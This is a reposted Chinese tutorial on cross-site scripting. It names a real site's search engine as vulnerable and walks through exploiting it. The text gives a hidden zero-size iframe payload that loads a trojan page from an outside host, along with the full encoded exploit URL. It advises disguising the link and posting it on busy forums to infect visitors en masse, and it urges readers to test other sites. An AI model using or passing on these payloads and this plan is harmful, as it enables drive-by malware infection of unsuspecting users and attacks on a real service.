专题研究第三期:XSS攻击——跨站(第二篇)

来源:互联网 发布:《网络创世纪》 编辑:程序博客网 时间:2024/05/20 12:50

我在引言篇讲述了跨站漏洞的一些利用方式。没有实例,可能比较抽象。这里我举个案例来说明问题:

ps:所举案例是 sina 台湾站搜索引擎,漏洞在文章发布之前仍然存在,这里只做示范。任何因此文带来的破坏行为皆非我所愿,请勿破坏。

打开
http://search.sina.com.tw

我们在搜索关键词里输入:
<script>alert("test")</script>
对其下各个搜索频道进行测试。

经过测试,我们发现 新闻、图片、分类等搜索存在xss跨站问题。

连这样的大站都存在问题,更不用说普通的网站了。大家可以测试其他站点的搜索引擎。

问题在于利用
结合url欺骗,我们可以很“温柔”地利用跨站。
a 大面积挂马
配置网马,在搜索关键词里填入:
<iframe src"
http://www.mama.com/ma.htm" name="hu" width="0" height="0"></iframe>
然后你会发现打开了我们的网马页面。此时复制地址栏地址:
http://google.sina.com.tw/cgi-bin/google_images.cgi?word=%3Ciframe+src%22http%3A%2F%2Fwww.mama.com%2Fma.htm%22+name%3D%22hu%22+width%3D%220%22+height%3D%220%22%3E%3C%2Fiframe%3E&submit=%B7j+%B4M&big5=1
这个就是咱们的马的页面了。
为了隐蔽,我们可以对
www.mama.com 进行url编码。

然后去个人流量大的bbs发个什么帖子。利用我前面说的url欺骗方式进行挂马。不怕肉鸡DDOS你,尽管试试吧。

b 针对指定目标
这里涉及到对目标站点源代码的熟悉情况。将在以后的几篇中介绍。